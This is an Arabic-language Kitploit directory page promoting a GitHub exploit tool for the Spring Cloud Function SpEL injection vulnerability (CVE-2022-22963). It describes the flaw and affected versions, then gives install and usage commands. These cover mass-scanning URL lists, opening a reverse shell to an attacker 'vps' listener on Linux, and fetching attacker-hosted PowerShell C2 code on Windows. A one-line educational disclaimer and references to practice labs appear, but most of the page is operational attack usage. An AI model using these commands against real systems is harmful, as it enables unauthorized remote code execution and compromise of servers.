Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
spring-cloud-function-rce — Spring Cloud Function ثغرة حقن تعبير SPEL (CVE-2022-22963) | Kitploit
أدوات/GitHubGitHub/k3rwin/spring-cloud-function-rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubk3rwin/spring-cloud-function-rce

spring-cloud-function-rce

Spring Cloud Function ثغرة حقن تعبير SPEL (CVE-2022-22963)

عرض المستودع
83منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Spring Cloud Function ثغرة حقن تعبير SPEL (CVE-2022-22963)

يوفر إطار Spring نموذجًا شاملاً للبرمجة والتكوين للتطبيقات المؤسسية الحديثة القائمة على java (على أي نوع من منصات النشر).

في إطار serverless في Spring Cloud، تقوم طريقة apply في الفئة RoutingFunction من إطار Spring Cloud Function بمعالجة معامل "spring.cloud.function.routing-expression" في رأس الطلب كتعبير SpEL، مما يؤدي إلى حقن تعبير SpEL، ويمكن للمهاجم تنفيذ أي كود من خلال هذه الثغرة.

نطاق التأثير: 3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2

النص البرمجي لأغراض تعليمية فقط، المسؤولية القانونية عن أي استخدام آخر لا تقع على عاتق المؤلف

1.installation(وحدة التثبيت)

root@kitploit:~
pip3 install -r requirements.txt	

2.Usage(الاستخدام)

python3 spring-cloud-function-rce.py -h

image-20220414184058525

-u تحديد عنوان URL واحد لاختبار dnslog

-e تحديد وضع shell العكسي

-s تحديد نظام التشغيل للمضيف الهدف، الافتراضي هو linux، المعلمات win/linux يستخدم مع المعاملين -i و -c

3.example(مثال استخدام)

3.1 اختبار عنوان URL واحد

python3 spring-cloud-function-rce.py -u "http://192.168.50.222:8080/"

image-20220414184202055

3.2 اختبار دفعة عناوين URL

python3 spring-cloud-function-rce.py -f "urls.txt"

image-20220414184424640

  • 123.58.236.76:47874 هو ميدان تدريب vulfocus docker، لم يتم تثبيت أمر nslookup، لذا فشل اختبار dnslog
  • يجب أن تكون عناوين URL الدفعية هي الدليل الجذر للموقع، http://192.168.50.222:8080/ هو الدليل الجذر لميدان التدريب المحلي، إضافة دليل test سيؤدي إلى فشل POC

3.3 الحصول على شيل على مضيف Linux

python3 spring-cloud-function-rce.py -u "http://192.168.50.222:8080/" -e -i "vps的ip地址:5566"

image-20220414185231029

3.4 الحصول على شيل على مضيف Windows

python3 spring-cloud-function-rce.py -u "http://192.168.50.222:8080/" -e -s "win" -c "http://vps/a"

-c يحدد عنوان كود PowerShell الذي يولده cs للاتصال، يجب استخدامه مع -s "win"، خيار -c يجب تنفيذ النص البرمجي تحت Windows، النص البرمجي سوف يستدعي PowerShell لتشفير POC

image-20220414185711222

image-20220414190020294

4. ميدان التدريب

4.1 الإعداد الذاتي باستخدام IntelliJ IDEA

المرجع

4.2 مختبر Docker

vulfocus

image-20220414190509578

تنزيل الأداة